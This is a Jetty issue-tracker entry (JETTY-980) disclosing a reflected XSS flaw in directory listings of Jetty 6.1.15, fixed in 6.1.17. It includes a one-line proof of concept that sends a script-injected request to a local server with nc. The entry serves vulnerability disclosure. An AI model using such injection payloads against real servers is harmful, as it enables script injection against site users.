Jetty
  1. Jetty
  2. JETTY-980

Security / Directory Listing XSS present

    Details

    • Type: Bug Bug
    • Status: Resolved Resolved
    • Priority: Major Major
    • Resolution: Fixed
    • Affects Version/s: 6.1.15
    • Fix Version/s: 6.1.17
    • Component/s: Security and SSL
    • Labels:
      None
    • Number of attachments :
      1

      Description

      A Directory Listing XSS has been reported.

      A reflective XSS can be induced whenever Jetty displays a web directory listing.

      Client-side script code can be included in HTTP response by appending it next to directory listing's path, preceded by the ';' character.

      Follows a PoC :

      $ echo -e "GET /cometd/dijit/;<script>alert(document.title);</script> HTTP/1.0\n\n" | nc 127.0.0.1 8080 
      HTTP/1.1 200 OK
      Content-Type: text/html; charset=utf-8 
      Content-Length: 5097 
      Server: Jetty(7.0.0.pre5)
      

        Issue Links

          Activity

          No work has yet been logged on this issue.

            People

            • Assignee:
              Greg Wilkins
              Reporter:
              Joakim Erdfelt
            • Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: